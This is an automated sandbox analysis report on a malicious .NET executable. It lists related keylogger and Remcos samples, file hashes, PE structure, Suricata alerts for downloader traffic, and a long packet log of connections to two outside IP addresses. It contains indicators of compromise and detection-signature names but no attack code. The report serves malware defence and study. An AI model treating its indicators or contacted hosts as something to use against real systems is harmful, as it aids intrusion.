                                                                                                                                            SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eQUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            pagamento.UniCredit.Bank.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            cONc2eILoR.dllGet hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            J7kSv1ojJD.dllGet hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            cONc2eILoR.dllGet hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            J7kSv1ojJD.dllGet hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            XJxog05C41.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            XJxog05C41.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            YqeOA9W4Z4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220

                                                                                                                                            Dropped Files

                                                                                                                                            No context

                                                                                                                                            Created / dropped Files

                                                                                                                                            No created / dropped files found

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Entropy (8bit):5.636909452144038
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                            File name:Lpjrd6Wxad.exe
                                                                                                                                            File size:274'432 bytes
                                                                                                                                            MD5:2ba023727b7a6399471d26a38f26695a
                                                                                                                                            SHA1:69d719ca185d62a737a2503a45b1b04cd097e190
                                                                                                                                            SHA256:51f52b4829b1930c3d4781e63ac08ccb74840c9b901b46b9f35274803e6d5571
                                                                                                                                            SHA512:8c503e6b5492b5a9f0f102bb30c34ba0c6d33af46d39edf7aa07429a07ae7720b0ec61a4fd1280d5ca4899e848cb436e1d3633b64f0c83a01e75e4be1f848ed9
                                                                                                                                            SSDEEP:3072:8icrbDkA33F1ykglgPXQdwflU4uSL12ZazfbIrTu5Yso2UY/Vg4imbbY:YudZaDbNRFb
                                                                                                                                            TLSH:2A4483193FD49810E2FF8577C2B69125C6BAB8A306158D2E17D1E81A3F3E944DE06F63
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............P..............9... ...@....@.. ....................................@................................

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                                                            Static PE Info

                                                                                                                                            General

                                                                                                                                            Entrypoint:0x44392e
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x669085D9 [Fri Jul 12 01:24:41 2024 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:4
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:4
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:4
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                            Entrypoint Preview

                                                                                                                                            Instruction
                                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al

                                                                                                                                            Data Directories

                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x438dc0x4f.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x440000x1017.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x460000xc.reloc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                            Sections

                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            .text0x20000x419340x41a00b2629c81f514dbeae295aa7ebae22513False0.21527901785714285data5.638874314512594IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            .rsrc0x440000x10170x120088098f3cc5116033740d150580315cfdFalse0.3546006944444444data4.768725814534678IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .reloc0x460000xc0x20012ea8885c1ee53d95e47bca720b95527False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                            Resources

                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                            RT_VERSION0x440a00x31cdata0.4271356783919598
                                                                                                                                            RT_MANIFEST0x443bc0xc5bXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.3926651912741069

                                                                                                                                            Imports

                                                                                                                                            DLLImport
                                                                                                                                            mscoree.dll_CorExeMain

                                                                                                                                            Network Behavior

                                                                                                                                            Suricata IDS Alerts

                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                            2024-11-07T15:19:30.556068+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849706193.122.130.080TCP
                                                                                                                                            2024-11-07T15:19:32.931122+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849706193.122.130.080TCP
                                                                                                                                            2024-11-07T15:19:33.661061+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849708188.114.96.3443TCP
                                                                                                                                            2024-11-07T15:19:35.790706+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849709193.122.130.080TCP
                                                                                                                                            2024-11-07T15:19:43.626300+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849717188.114.96.3443TCP
                                                                                                                                            2024-11-07T15:19:43.784767+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.849714TCP
                                                                                                                                            2024-11-07T15:19:46.123464+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849722188.114.96.3443TCP
                                                                                                                                            2024-11-07T15:20:22.004076+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.849729TCP

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Nov 7, 2024 15:19:27.676573992 CET4970680192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:27.681473970 CET8049706193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:27.681561947 CET4970680192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:27.681952953 CET4970680192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:27.686779976 CET8049706193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:28.980173111 CET8049706193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:28.997977018 CET4970680192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:29.002871037 CET8049706193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:30.501673937 CET8049706193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:30.550683022 CET49707443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:30.550726891 CET44349707188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:30.550786972 CET49707443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:30.556067944 CET4970680192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:30.559814930 CET49707443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:30.559833050 CET44349707188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:31.207993031 CET44349707188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:31.208106041 CET49707443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:31.215787888 CET49707443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:31.215800047 CET44349707188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:31.216104984 CET44349707188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:31.259198904 CET49707443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:31.267218113 CET49707443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:31.311340094 CET44349707188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:31.472800016 CET44349707188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:31.472897053 CET44349707188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:31.473037958 CET49707443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:31.479054928 CET49707443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:31.482440948 CET4970680192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:31.487319946 CET8049706193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:32.888868093 CET8049706193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:32.900310993 CET49708443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:32.900352001 CET44349708188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:32.900408030 CET49708443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:32.900845051 CET49708443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:32.900857925 CET44349708188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:32.931122065 CET4970680192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:33.507742882 CET44349708188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:33.510415077 CET49708443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:33.510456085 CET44349708188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:33.661062956 CET44349708188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:33.661154985 CET44349708188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:33.661250114 CET49708443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:33.661781073 CET49708443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:33.665072918 CET4970680192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:33.666435957 CET4970980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:33.670344114 CET8049706193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:33.670404911 CET4970680192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:33.671325922 CET8049709193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:33.671397924 CET4970980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:33.671489000 CET4970980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:33.676790953 CET8049709193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:35.745354891 CET8049709193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:35.746782064 CET49710443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:35.746824026 CET44349710188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:35.746907949 CET49710443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:35.747193098 CET49710443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:35.747205973 CET44349710188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:35.790705919 CET4970980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:36.386620998 CET44349710188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:36.388458014 CET49710443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:36.388499975 CET44349710188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:36.533402920 CET44349710188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:36.533513069 CET44349710188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:36.533560038 CET49710443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:36.534020901 CET49710443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:36.543509960 CET4971180192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:36.548369884 CET8049711193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:36.548437119 CET4971180192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:36.548551083 CET4971180192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:36.553987980 CET8049711193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:39.220664024 CET8049711193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:39.233215094 CET4971280192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:39.238118887 CET8049712193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:39.238220930 CET4971280192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:39.238316059 CET4971280192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:39.243227005 CET8049712193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:39.274831057 CET4971180192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.213118076 CET8049712193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.213666916 CET4971180192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.214350939 CET49713443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:41.214402914 CET44349713188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.214472055 CET49713443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:41.214807034 CET49713443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:41.214821100 CET44349713188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.218935013 CET8049711193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.219028950 CET4971180192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.259181023 CET4971280192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.815099001 CET44349713188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.816976070 CET49713443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:41.817003965 CET44349713188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.956859112 CET44349713188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.956953049 CET44349713188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.957012892 CET49713443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:41.957752943 CET49713443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:41.961616039 CET4971280192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.962831974 CET4971580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.967048883 CET8049712193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.967144966 CET4971280192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.967674017 CET8049715193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.967741013 CET4971580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.967837095 CET4971580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.972909927 CET8049715193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:42.795804977 CET8049715193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:42.797002077 CET49717443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:42.797058105 CET44349717188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:42.797127962 CET49717443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:42.797383070 CET49717443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:42.797401905 CET44349717188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:42.837337017 CET4971580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:43.403500080 CET44349717188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:43.446671963 CET49717443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:43.476362944 CET49717443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:43.476376057 CET44349717188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:43.626302958 CET44349717188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:43.626410961 CET44349717188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:43.626476049 CET49717443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:43.626966000 CET49717443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:43.629961014 CET4971580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:43.631010056 CET4971980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:43.635389090 CET8049715193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:43.635493994 CET4971580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:43.635862112 CET8049719193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:43.635952950 CET4971980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:43.636042118 CET4971980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:43.640778065 CET8049719193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:45.321227074 CET8049719193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:45.323231936 CET49722443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:45.323290110 CET44349722188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:45.323367119 CET49722443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:45.323632002 CET49722443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:45.323651075 CET44349722188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:45.368546963 CET4971980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:45.937875986 CET44349722188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:45.959532976 CET49722443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:45.959574938 CET44349722188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:46.123471022 CET44349722188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:46.123558044 CET44349722188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:46.123632908 CET49722443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:46.124099970 CET49722443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:46.127082109 CET4971980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:46.128177881 CET4972380192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:46.132565022 CET8049719193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:46.132633924 CET4971980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:46.133157969 CET8049723193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:46.133214951 CET4972380192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:46.133323908 CET4972380192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:46.138108969 CET8049723193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:47.962872028 CET8049723193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:47.964226961 CET49724443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:47.964274883 CET44349724188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:47.964333057 CET49724443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:47.964590073 CET49724443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:47.964608908 CET44349724188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:48.009162903 CET4972380192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:48.578725100 CET44349724188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:48.585269928 CET49724443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:48.585289001 CET44349724188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:48.744657040 CET44349724188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:48.744771004 CET44349724188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:48.744860888 CET49724443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:48.745488882 CET49724443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:48.748339891 CET4972380192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:48.749537945 CET4972580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:48.753793001 CET8049723193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:48.753853083 CET4972380192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:48.754420042 CET8049725193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:48.754488945 CET4972580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:48.754596949 CET4972580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:48.759561062 CET8049725193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:50.383461952 CET8049725193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:50.384769917 CET49726443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:50.384810925 CET44349726188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:50.384995937 CET49726443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:50.385323048 CET49726443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:50.385334969 CET44349726188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:50.431044102 CET4972580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:50.983046055 CET44349726188.114.96.3192.168.2.8
